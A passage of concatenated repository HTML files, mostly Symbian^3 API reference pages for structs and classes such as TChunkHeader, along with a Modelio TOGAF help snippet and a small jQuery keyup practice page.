this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> ESock::TUPSStatusChangeParams Struct Reference </h1> <table class="signature"> <tr> <td> struct ESock::TUPSStatusChangeParams </td> </tr> </table> <div class="section"> <div> <p> Parameters passed in a UPS Status Change message </p> </div> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-8AF0B3F6-5AC4-36DB-A030-16FBDAAC8035"> TUPSStatusChangeParams </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> </td> <td> <a href="#GUID-23988053-89E3-3A4D-A194-20059961C709"> TUPSStatusChangeParams </a> (const <a href="GUID-2B5DA16C-3FBA-36CE-8821-E68B1BE45B9F.html"> TProcessId </a> &amp;, const <a href="GUID-0CBB58B2-3371-3A29-97FF-98E258C55B93.html"> TThreadId </a> &amp;, const <a href="GUID-D3D29CDF-78B3-3527-B2F0-C9951A43A7B5.html"> Messages::TNodeId </a> &amp;) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-D3D29CDF-78B3-3527-B2F0-C9951A43A7B5.html"> Messages::TNodeId </a> </td> <td> <a href="#GUID-15F71370-9E18-390B-B724-6863BCF09D3A"> iCommsId </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-2B5DA16C-3FBA-36CE-8821-E68B1BE45B9F.html"> TProcessId </a> </td> <td> <a href="#GUID-4FF2262F-DEAF-3A4C-8022-B57A85F823F7"> iProcessId </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-0CBB58B2-3371-3A29-97FF-98E258C55B93.html"> TThreadId </a> </td> <td> <a href="#GUID-C1B6FB03-0FAB-3155-BD4F-289C0E7BA797"> iThreadId </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Constructor &amp; Destructor Documentation </h1> <div class="nested1" id="GUID-8AF0B3F6-5AC4-36DB-A030-16FBDAAC8035"> <a name="GUID-8AF0B3F6-5AC4-36DB-A030-16FBDAAC8035"> <!-- --> </a> <h2 class="topictitle2"> TUPSStatusChangeParams() </h2> <table class="signature"> <tr> <td> TUPSStatusChangeParams </td> <td> ( </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-23988053-89E3-3A4D-A194-20059961C709"> <a name="GUID-23988053-89E3-3A4D-A194-20059961C709"> <!-- --> </a> <h2 class="topictitle2"> TUPSStatusChangeParams(const TProcessId &amp;, const TThreadId &amp;, const Messages::TNodeId &amp;) </h2> <table class="signature"> <tr> <td> TUPSStatusChangeParams </td> <td> ( </td> <td> const <a href="GUID-2B5DA16C-3FBA-36CE-8821-E68B1BE45B9F.html"> TProcessId </a> &amp; </td> <td> aProcessId, </td> </tr> <tr> <td colspan="2"> </td> <td> const <a href="GUID-0CBB58B2-3371-3A29-97FF-98E258C55B93.html"> TThreadId </a> &amp; </td> <td> aThreadId, </td> </tr> <tr> <td colspan="2"> </td> <td> const <a href="GUID-D3D29CDF-78B3-3527-B2F0-C9951A43A7B5.html"> Messages::TNodeId </a> &amp; </td> <td> aCommsId </td> </tr> <tr> <td colspan="1"> </td> <td> ) </td> <td colspan="2"> [inline] </td> </tr> </table> <div class="section"> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> const <a href="GUID-2B5DA16C-3FBA-36CE-8821-E68B1BE45B9F.html"> TProcessId </a> &amp; aProcessId </td> <td> </td> </tr> <tr class="bg"> <td class="parameter"> const <a href="GUID-0CBB58B2-3371-3A29-97FF-98E258C55B93.html"> TThreadId </a> &amp; aThreadId </td> <td> </td> </tr> <tr> <td class="parameter"> const <a href="GUID-D3D29CDF-78B3-3527-B2F0-C9951A43A7B5.html"> Messages::TNodeId </a> &amp; aCommsId </td> <td> </td> </tr> </table> </div> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-15F71370-9E18-390B-B724-6863BCF09D3A"> <a name="GUID-15F71370-9E18-390B-B724-6863BCF09D3A"> <!-- --> </a> <h2 class="topictitle2"> Messages::TNodeId iCommsId </h2> <table class="signature"> <tr> <td> <a href="GUID-D3D29CDF-78B3-3527-B2F0-C9951A43A7B5.html"> Messages::TNodeId </a> </td> <td> iCommsId </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-4FF2262F-DEAF-3A4C-8022-B57A85F823F7"> <a name="GUID-4FF2262F-DEAF-3A4C-8022-B57A85F823F7"> <!-- --> </a> <h2 class="topictitle2"> TProcessId iProcessId </h2> <table class="signature"> <tr> <td> <a href="GUID-2B5DA16C-3FBA-36CE-8821-E68B1BE45B9F.html"> TProcessId </a> </td> <td> iProcessId </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-C1B6FB03-0FAB-3155-BD4F-289C0E7BA797"> <a name="GUID-C1B6FB03-0FAB-3155-BD4F-289C0E7BA797"> <!-- --> </a> <h2 class="topictitle2"> TThreadId iThreadId </h2> <table class="signature"> <tr> <td> <a href="GUID-0CBB58B2-3371-3A29-97FF-98E258C55B93.html"> TThreadId </a> </td> <td> iThreadId </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
sdk/GUID-F1EFF7CC-2F29-3936-99FD-2303A76A1793.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxStruct" /> <meta name="DC.Title" content="OMX_FRAMESIZETYPE" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-F1EFF7CC-2F29-3936-99FD-2303A76A1793" /> <title> OMX_FRAMESIZETYPE </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-F1EFF7CC-2F29-3936-99FD-2303A76A1793"> <a name="GUID-F1EFF7CC-2F29-3936-99FD-2303A76A1793"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2858858 id2409913 id2554199 id2554203 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> OMX_FRAMESIZETYPE Struct Reference </h1> <table class="signature"> <tr> <td> struct OMX_FRAMESIZETYPE </td> </tr> </table> <div class="section"> <div> <p> Hold frame dimension </p> <p> STRUCT MEMBERS: nSize : Size of the structure in bytes nVersion : OMX specification version information nPortIndex : Port that this structure applies to nWidth : Frame width in pixels nHeight : Frame height in pixels </p> </div> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> <a href="#GUID-E7617F5F-CD70-36F0-B51D-93F6745E0AAB"> nHeight </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> <a href="#GUID-39FF0F2F-AD35-3C22-8977-D82DD2B359F4"> nPortIndex </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> <a href="#GUID-18E8BE52-955B-31F1-B456-18314C49179C"> nSize </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-4B49A214-0F5A-39FD-8BD5-EF023B1F0B3B.html"> OMX_VERSIONTYPE </a> </td> <td> <a href="#GUID-BB38B216-F206-3B94-A0AD-9DAE4B3F8818"> nVersion </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> <a href="#GUID-0B3B634C-F29A-3456-B809-F37AE458EB8D"> nWidth </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-E7617F5F-CD70-36F0-B51D-93F6745E0AAB"> <a name="GUID-E7617F5F-CD70-36F0-B51D-93F6745E0AAB"> <!-- --> </a> <h2 class="topictitle2"> OMX_U32 nHeight </h2> <table class="signature"> <tr> <td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> nHeight </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-39FF0F2F-AD35-3C22-8977-D82DD2B359F4"> <a name="GUID-39FF0F2F-AD35-3C22-8977-D82DD2B359F4"> <!-- --> </a> <h2 class="topictitle2"> OMX_U32 nPortIndex </h2> <table class="signature"> <tr> <td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> nPortIndex </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-18E8BE52-955B-31F1-B456-18314C49179C"> <a name="GUID-18E8BE52-955B-31F1-B456-18314C49179C"> <!-- --> </a> <h2 class="topictitle2"> OMX_U32 nSize </h2> <table class="signature"> <tr> <td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> nSize </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-BB38B216-F206-3B94-A0AD-9DAE4B3F8818"> <a name="GUID-BB38B216-F206-3B94-A0AD-9DAE4B3F8818"> <!-- --> </a> <h2 class="topictitle2"> OMX_VERSIONTYPE nVersion </h2> <table class="signature"> <tr> <td> <a href="GUID-4B49A214-0F5A-39FD-8BD5-EF023B1F0B3B.html"> OMX_VERSIONTYPE </a> </td> <td> nVersion </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-0B3B634C-F29A-3456-B809-F37AE458EB8D"> <a name="GUID-0B3B634C-F29A-3456-B809-F37AE458EB8D"> <!-- --> </a> <h2 class="topictitle2"> OMX_U32 nWidth </h2> <table class="signature"> <tr> <td> <a href="GUID-80870B18-F858-3C5B-B3D7-9FF98185B6B5.html"> OMX_U32 </a> </td> <td> nWidth </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
doc/modelio/GHub Portal/mda/TogafArchitect/res/help/TogafProjectContextDiagram.html
GazeboHub/ghub-portal-doc
<html><b>ProjectContext</b><p> </p><p> A Project Context diagram shows the scope of a work package to be implemented as a part of a broader transformation roadmap. The Project Context diagram links a work package to the organizations, functions, services, processes, applications, data, and technology that will be added, removed, or impacted by the project. The Project Context diagram is also a valuable tool for project portfolio management and project mobilization.</p><p> Under Modelio : Drag & drop the essential application component of the project, the main requirements, the related business processes, business interfaces, business functions, and express what requirement are satisfied by the project, which business processes are implemented, which functions are related, and which roles will use the targeted components. Relationships to other parts of the IS can also be expressed.</p></html>
Practicas/Bootstrap/keyup.html
TheSuperJez/ReactWebAppsCourse
<!DOCTYPE html> <html> <head> <title>Template HTML</title> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" /> <!-- Latest compiled and minified CSS --> <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css"> <!-- jQuery library --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script> <!-- Latest compiled JavaScript --> <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script> <script> $(document).ready(function(){ $( "#nombre" ).keyup(function(e) { if(e.which==13){ alert('Diste enter'); } }); }); </script> </head> <body> <div class="container"> <input type="text" id="nombre" /> </div> </body> </html>
sdk/GUID-7B803F61-DD9B-3A20-B74E-492A1E6EE15A.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="TChunkHeader" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-7B803F61-DD9B-3A20-B74E-492A1E6EE15A" /> <title> TChunkHeader </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-7B803F61-DD9B-3A20-B74E-492A1E6EE15A"> <a name="GUID-7B803F61-DD9B-3A20-B74E-492A1E6EE15A"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> TChunkHeader Class Reference </h1> <table class="signature"> <tr> <td> class TChunkHeader </td> </tr> </table> <div class="section"> <div> <p> This class is set in the beginning of the <a href="GUID-326A2F4D-0E99-31C0-A35D-E8BF45913F07.html#GUID-326A2F4D-0E99-31C0-A35D-E8BF45913F07"> RChunk </a> . Class is used to store header information. </p> <p> Note: All data in here must be 4-byte aligned (using dummy values if needed) </p> </div> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-42986D61-F757-36BC-B491-477712AFC8B2"> ContextId </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-6DF80DF3-162D-31D0-99A7-F951CDC8BA51"> DescriptorCount </a> () </td> </tr> <tr> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> </td> <td> <a href="#GUID-320DD93A-6954-3F48-B26D-09584DB5EC3F"> DoInitBeforeSending </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TDirection </a> </td> <td> <a href="#GUID-1A94D214-C5D3-3449-8300-3487B896DE42"> MessageDirection </a> () </td> </tr> <tr> <td align="right" class="code"> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TClass </a> </td> <td> <a href="#GUID-23FA9668-9152-3C27-A679-7CB569BC5D9B"> MessageType </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-8EEB39A6-6B5B-3B90-975E-235E7457D126"> PendingTransactionId </a> () </td> </tr> <tr> <td align="right" class="code"> <a href="GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11.html"> MSenProperties::TSenPropertiesClassType </a> </td> <td> <a href="#GUID-C2AF68FF-F506-3D70-B9B5-DAE7DEE53E6A"> PropertiesType </a> () </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-EE0CF0E9-5A47-3667-A713-D8B914F88B38"> SetContextId </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-928BBD29-BCE8-3324-B061-F97CAE3D933C"> SetDescriptorCount </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-8E39861D-B90D-3B85-A8F4-6663D25F5869"> SetDoInitBeforeSending </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> ) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-54798619-6858-3BEA-9675-FAD873649B8A"> SetMessageDirection </a> ( <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TDirection </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-F64BB449-0A1A-3448-A3AC-50250B799BD1"> SetMessageType </a> ( <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TClass </a> ) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-7FC84016-8D1E-31AD-B9A9-DDBBBF8E8EFD"> SetPendingTransactionId </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> void </td> <td> <a href="#GUID-BE43BD41-4CBE-3622-995C-114C9458B931"> SetPropertiesType </a> ( <a href="GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11.html"> MSenProperties::TSenPropertiesClassType </a> ) </td> </tr> <tr> <td align="right" class="code"> void </td> <td> <a href="#GUID-9274CE96-B743-30E2-BA4E-AD3F7D3D1602"> SetTransactionId </a> ( <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> <tr class="bg"> <td align="right" class="code"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-2BA99E48-5EE4-3FED-8487-AB0746B1D510"> TransactionId </a> () </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Private Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-8648CD28-719C-3F40-95BD-85C7CC586FA0"> iContextId </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-1068BF39-9090-319B-A744-F4519F9C7CC2"> iDescriptorCount </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-CBC6B87F-5C14-397B-A683-B2777D409638"> iDoInitBeforeSending </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-AE21363E-8D86-3538-8C89-5100F3CF27FE"> iMessageDirection </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-8AE64B2B-DF35-35E9-AEC2-B1869619D1CC"> iMessageType </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-41415D67-C28C-3700-8F50-FC47126388F6"> iPendingTransactionId </a> </td> </tr> <tr> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-44447BC4-8258-3961-B578-C0D51BA5C883"> iPropertiesType </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> <a href="#GUID-661F2300-B0B5-370E-9BAA-E79AF0707597"> iTransactionId </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Member Functions Documentation </h1> <div class="nested1" id="GUID-42986D61-F757-36BC-B491-477712AFC8B2"> <a name="GUID-42986D61-F757-36BC-B491-477712AFC8B2"> <!-- --> </a> <h2 class="topictitle2"> ContextId() </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> ContextId </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter for ctx id. </p> </div> </div> </div> <div class="nested1" id="GUID-6DF80DF3-162D-31D0-99A7-F951CDC8BA51"> <a name="GUID-6DF80DF3-162D-31D0-99A7-F951CDC8BA51"> <!-- --> </a> <h2 class="topictitle2"> DescriptorCount() </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> DescriptorCount </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter for descriptor count. </p> </div> </div> </div> <div class="nested1" id="GUID-320DD93A-6954-3F48-B26D-09584DB5EC3F"> <a name="GUID-320DD93A-6954-3F48-B26D-09584DB5EC3F"> <!-- --> </a> <h2 class="topictitle2"> DoInitBeforeSending() </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> </td> <td> DoInitBeforeSending </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter to determine should init be done before sending the message. </p> </div> </div> </div> <div class="nested1" id="GUID-1A94D214-C5D3-3449-8300-3487B896DE42"> <a name="GUID-1A94D214-C5D3-3449-8300-3487B896DE42"> <!-- --> </a> <h2 class="topictitle2"> MessageDirection() </h2> <table class="signature"> <tr> <td> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TDirection </a> </td> <td> MessageDirection </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter for message direction enumeration MSenMessage.h </p> </div> </div> </div> <div class="nested1" id="GUID-23FA9668-9152-3C27-A679-7CB569BC5D9B"> <a name="GUID-23FA9668-9152-3C27-A679-7CB569BC5D9B"> <!-- --> </a> <h2 class="topictitle2"> MessageType() </h2> <table class="signature"> <tr> <td> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TClass </a> </td> <td> MessageType </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter for message class enumeration MSenMessage.h </p> </div> </div> </div> <div class="nested1" id="GUID-8EEB39A6-6B5B-3B90-975E-235E7457D126"> <a name="GUID-8EEB39A6-6B5B-3B90-975E-235E7457D126"> <!-- --> </a> <h2 class="topictitle2"> PendingTransactionId() </h2> <table class="signature"> <tr> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> PendingTransactionId </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter for pending transaction id. </p> </div> </div> </div> <div class="nested1" id="GUID-C2AF68FF-F506-3D70-B9B5-DAE7DEE53E6A"> <a name="GUID-C2AF68FF-F506-3D70-B9B5-DAE7DEE53E6A"> <!-- --> </a> <h2 class="topictitle2"> PropertiesType() </h2> <table class="signature"> <tr> <td> <a href="GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11.html"> MSenProperties::TSenPropertiesClassType </a> </td> <td> PropertiesType </td> <td> ( </td> <td> ) </td> <td> const [inline] </td> </tr> </table> <div class="section"> <div> <p> Getter for (transport) properties type. <a href="GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11.html#GUID-EF00E2C6-EA3C-37F9-ADBF-D34A9ABFBE11"> MSenProperties </a> </p> </div> </div> </div> <div class="nested1" id="GUID-EE0CF0E9-5A47-3667-A713-D8B914F88B38"> <a name="GUID-EE0CF0E9-5A47-3667-A713-D8B914F88B38"> <!-- --> </a> <h2 class="topictitle2"> SetContextId(TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> SetContextId </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aId </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Setter for ctx id. </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aId </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-928BBD29-BCE8-3324-B061-F97CAE3D933C"> <a name="GUID-928BBD29-BCE8-3324-B061-F97CAE3D933C"> <!-- --> </a> <h2 class="topictitle2"> SetDescriptorCount(TInt) </h2> <table class="signature"> <tr> <td> void </td> <td> SetDescriptorCount </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aCount </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Setter for descriptor count. </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aCount </td> <td> is the descriptor count </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-8E39861D-B90D-3B85-A8F4-6663D25F5869"> <a name="GUID-8E39861D-B90D-3B85-A8F4-6663D25F5869"> <!-- --> </a> <h2 class="topictitle2"> SetDoInitBeforeSending(TBool) </h2> <table class="signature"> <tr> <td> void </td> <td> SetDoInitBeforeSending </td> <td> ( </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> </td> <td> aValue </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Sets the flag indicating that init should be done before sending the message </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TBool </a> aValue </td> <td> if ETrue, init will be done before sending if EFalse, init will not be done before sending </td> </tr> </table> </div> </div> <div class="nested1" id="GUID-54798619-6858-3BEA-9675-FAD873649B8A"> <a name="GUID-54798619-6858-3BEA-9675-FAD873649B8A"> <!-- --> </a> <h2 class="topictitle2"> SetMessageDirection(MSenMessage::TDirection) </h2> <table class="signature"> <tr> <td> void </td> <td> SetMessageDirection </td> <td> ( </td> <td> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TDirection </a> </td> <td> aDirection </td> <td> ) </td> <td> [inline] </td> </tr> </table> <div class="section"> <div> <p> Setter for message direction enumeration MSenMessage.h </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> <a href="GUID-400DDC19-D81C-3596-BB17-0135195824B0.html"> MSenMessage::TDirection </a> aDirection </td> <td> </td> </tr> </table> </div> </div> <div class="nested1" 